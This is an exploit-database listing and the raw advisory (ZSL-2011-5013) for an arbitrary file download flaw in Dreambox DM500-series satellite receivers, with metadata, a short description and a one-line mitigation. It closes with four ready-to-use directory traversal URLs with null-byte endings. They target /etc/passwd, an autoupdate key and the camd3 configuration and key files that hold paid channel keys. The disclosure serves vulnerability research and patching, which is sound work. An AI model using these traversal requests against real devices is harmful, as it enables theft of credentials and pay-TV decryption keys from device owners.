header-logo
Suggest Exploit
vendor:
Dreambox
by:
Gjoko 'LiquidWorm' Krstic
7.5
CVSS
HIGH
Arbitrary File Download
22
CWE
Product Name: Dreambox
Affected Version From: DM500
Affected Version To: DM500S
Patch Exists: YES
Related CWE: N/A
CPE: Dream Multimedia GmbH/Dreambox
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux Kernel 2.6.9, The Gemini Project, Enigma
2010

DreamBox DM500(+) Arbitrary File Download Vulnerability

Dreambox suffers from a file download vulnerability thru directory traversal with appending the '/' character in the HTTP GET method of the affected host address. The attacker can get to sensitive information like paid channel keys, usernames, passwords, config and plug-ins info, etc.

Mitigation:

Ensure that the web server is configured to prevent directory traversal attacks.
Source

Exploit-DB raw data:

 DreamBox DM500(+) Arbitrary File Download Vulnerability


 Vendor: Dream Multimedia GmbH
 Product web page: http://www.dream-multimedia-tv.de
 Affected version: DM500, DM500+, DM500HD and DM500S

 Summary: The Dreambox is a series of Linux-powered
 DVB satellite, terrestrial and cable digital television
 receivers (set-top box).

 Desc: Dreambox suffers from a file download vulnerability
 thru directory traversal with appending the '/' character
 in the HTTP GET method of the affected host address. The
 attacker can get to sensitive information like paid channel
 keys, usernames, passwords, config and plug-ins info, etc.

 Tested on: Linux Kernel 2.6.9, The Gemini Project, Enigma


 Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com
 Zero Science Lab - http://www.zeroscience.mk


 Advisory ID: ZSL-2011-5013
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5013.php


 22.12.2010


 --------------------------------------------------------------------

 http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00
 http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00
 http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00
 http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00